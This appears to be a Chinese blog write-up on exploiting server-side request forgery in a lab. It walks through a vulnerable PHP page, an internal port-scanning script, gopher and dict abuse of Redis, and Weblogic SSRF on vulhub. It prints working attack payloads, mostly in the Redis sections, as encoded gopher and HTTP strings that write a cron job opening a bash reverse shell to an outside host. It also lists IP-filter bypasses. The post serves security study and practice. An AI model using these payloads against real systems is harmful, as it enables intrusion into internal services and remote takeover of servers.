SSRF漏洞利用

前言

之前自己搭建ssrf漏洞的时候,只是简单复现。现在突然发现可以继续深入一下,算是对之前的补充吧。

回顾

参考 SSRF(服务端请求伪造)漏洞
使用phpstudy环境
ssrf.php直接访问即可,源码为:

<?php
$url=@$_GET['url'];
$ch=curl_init();//初始化会话
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$res=curl_exec($ch);//执行会话
curl_close($ch);
echo $res;//有回显
//无回显
if($res){
    echo "True";
}else{
    echo "False";
}
?>

漏洞存在

有回显
echo $res;

对url参数进行修改,向百度浏览器发送请求。可证实为SSRF漏洞。

ssrf.php?url=http://www.baidu.com
image.png

无回显
即不输出。if($res){ echo "True"; }else{ echo "False"; }
因为没有回显无法直观看到页面的变化,只返回True或False判断,采用公网服务器端口监听的方式判断SSRF漏洞是否存在。
公网服务器nc进行监听

nc -lvp 8080

靶机发送请求

ssrf.php?url=http://47.94.xx.xx:8080
image.png

接收到数据包。可证实存在SSRF漏洞

利用方式

SSRF漏洞可以判断内网主机存活以及端口开放情况,可以读取服务器文件,攻击内网的web应用。

服务探测

有回显

ssrf.php?url=http://127.0.0.1:8080
image.png

可以借助burp的Intruder尝试探测。

image.png

如果对资产了解不足,可以先对C段进行探测以及一些端口22,80,8080,7001,6379等
但是灵活度不够,可以编写脚本进行探测。

#coding='utf-8'
import requests

scheme = 'http'
port_list = [22,80,3306,3389,6379,8080,8088]

def run():
    for i in range(130,136):
        for port in port_list:
            ip='192.168.197.'+str(i)
            payload = '{scheme}://{ip}:{port}'.format(
                scheme=scheme,
                ip=ip,
                port=port
            )
            url= "http://192.168.197.216/ssrf.php?url={payload}".format(payload=payload)
            print url
            try:
                r = requests.get(url,timeout=5,verify=False)
                print r.text
            except Exception,e:
                pass
if __name__ == '__main__':
    run()

github上也有现成工具。
https://github.com/swisskyrepo/SSRFmap
https://github.com/bcoles/ssrf_proxy
https://github.com/tarunkant/Gopherus

无回显
即不输出。if($res){ echo "True"; }else{ echo "False"; }
对于这种Bool型的SSRF漏洞,只是简单返回True或False,没有任何响应信息。即使使用payload也无法验证是否利用成功,所以利用起来很费劲。

文件读取

有回显
利用file协议可进行任意文件读取。

image.png

利用dict协议可以操作redis服务。

image.png

无回显
无法输出内容,该方式作废。

gopher协议

能够利用的协议有很多,如ftp协议、http协议、dict协议、file协议等等
这里重点看一下gopher协议。
gopher协议,分布型的文件搜集获取网络协议,支持发出GET、POST请求。可以先截获get请求包和post请求包,然后再构造成符合gopher协议的请求。gopher协议在ssrf利用中很强大。
有回显

服务器nc进行监听

nc -lvp 2333

靶机发送请求

ssrf.php?url=gopher://172.16.111.98:2333/_hello
img

SSRF漏洞在真实环境常常去攻击redis、FastCGI等服务。

攻击redis

使用gopher协议发送数据包与常见post数据包不太一样。gopher发送的数据包需为十六进制。我们可以使用一些抓包工具将请求的数据抓取下来,然后不断拷贝,操作中非常容易出错。所以找到负责转换gopher的payload的工具。

https://github.com/firebroo/sec_tools/tree/master/common-gopher-tcp-stream

下载到kali上,make编译即可生成sniffer工具。并在本地kali上搭建redis服务。
输入info命令查看redis服务,并开启sniffer捕捉到的命令即为payload。

image.png

gopher协议格式为:gopher:/ip:port/_ + payload

gopher://192.168.197.134:6379/_%2a%31%0d%0a%24%37%0d%0a%43%4f%4d%4d%41%4e%44%0d%0a%2a%31%0d%0a%24%34%0d%0a%69%6e%66%6f%0d%0a

有回显

将该payload拷贝到burp数据包中,响应500错误。

image.png

使用curl进行发送,请求成功。

curl 'gopher://192.168.197.134:6379/_%2a%31%0d%0a%24%37%0d%0a%43%4f%4d%4d%41%4e%44%0d%0a%2a%31%0d%0a%24%34%0d%0a%69%6e%66%6f%0d%0a'
image.png

证明实际是可以发送成功的。

下面进一步攻击redis服务。
关于攻击redis服务参考我之前的一篇文章 redis漏洞利用
这里依然用简单快捷的shell反弹

config set dir /var/spool/cron/
set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/47.94.80.xxx/8080 0>&1\n\n"
config set dbfilename root
save

将反弹shell的命令生成payload进行发送。sniff捕捉payload。

image.png

payload为:

%2a%31%0d%0a%24%37%0d%0a%43%4f%4d%4d%41%4e%44%0d%0a%2a%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%33%0d%0a%64%69%72%0d%0a%24%31%35%0d%0a%2f%76%61%72%2f%73%70%6f%6f%6c%2f%63%72%6f%6e%0d%0a%2a%33%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%33%0d%0a%78%78%78%0d%0a%24%36%31%0d%0a%0a%0a%2a%2f%31%20%2a%20%2a%20%2a%20%2a%20%2f%62%69%6e%2f%62%61%73%68%20%2d%69%3e%26%2f%64%65%76%2f%74%63%70%2f%34%37%2e%39%34%2e%38%30%2e%31%32%39%2f%38%30%38%30%20%30%3e%26%31%0a%0a%0d%0a%2a%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%31%30%0d%0a%64%62%66%69%6c%65%6e%61%6d%65%0d%0a%24%34%0d%0a%72%6f%6f%74%0d%0a%2a%31%0d%0a%24%34%0d%0a%73%61%76%65%0d%0a

然后使用gopher协议进行构造,并进行url编码。虽然服务器返回500,但可以成功创建任务计划执行。

image.png

shell随之接收

image.png

无回显

无回显的利用方式一样,服务器响应也为500。

绕过IP限制

1.利用@符号

ssrf.php?url=http://www.baidu.com@127.0.0.1:80

和访问127.0.0.1效果一样

2.利用短地址
使用在线短链生成器

https://url.cn/5fyRNDC

3.利用特殊域名

http://127.0.0.1.xip.io/
http://www.owasp.org.127.0.0.1.xip.io/
http://mysite.10.0.0.1.xip.io 
http://foo.bar.10.0.0.1.xip.io

4.利用进制转换
可以是十六进制,八进制等。
例如192.168.197.134
首先把这四段数字给分别转成16进制,结果:c0 a8 c5 86
然后把 c0a8c586 这十六进制一起转换成8进制30052142606
记得访问的时候加0表示使用八进制(可以是一个0也可以是多个0)十六进制加0x

image.png

weblogic SSRF漏洞复现

使用vluhab进行复现该漏洞。

docker-compose build
docker-compose up -d

https://github.com/vulhub/vulhub/tree/master/weblogic/ssrf

image.png

漏洞存在于/uddiexplorer/SearchPublicRegistries.jsp页面

image.png

burp抓取数据包, operator参数存在SSRF漏洞

image.png

当访问不存在的端口,返回could not connect over HTTP to server

image.png

当访问存在的端口时,显示error code。

image.png

当访问的非http协议,则会返回did not have a valid SOAP content-type

但是当我借助docker的weblogic ssrf漏洞去探测我手动搭建的redis服务时,出现了问题。

image.png

响应Response contained no data ,未找到解决办法。

去探测docker的redis服务时,响应正常

image.png

利用docker的环境攻击redis服务反弹shell。
向redis发送命令,将shell脚本写进计划任务。

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/47.94.xx.xxx/8080 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

将该命令通过get方式进行发送,需要进行url编码。
注意:换行符是"\r\n",也就是"%0D%0A"

http://172.18.0.2:6379/%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn%2A%20%2A%20%2A%20%2A%20%2A%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F47.94.xx.xxx%2F8080%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0Aaaa

注意这里使用的是http协议。因为java不支持除了http、https协议的其他协议。

image.png

即可反弹shell。

image.png

在自己手动搭建的weblogic和redis环境中,漏洞无法结合利用。
原因未知,复现出来的还请大佬告知。

参考资料
了解SSRF,这一篇就足够了
SSRF漏洞的利用与学习
SSRF in PHP
https://joychou.org/web/phpssrf.html
SSRF绕过方法总结
SSRF的一些利用姿势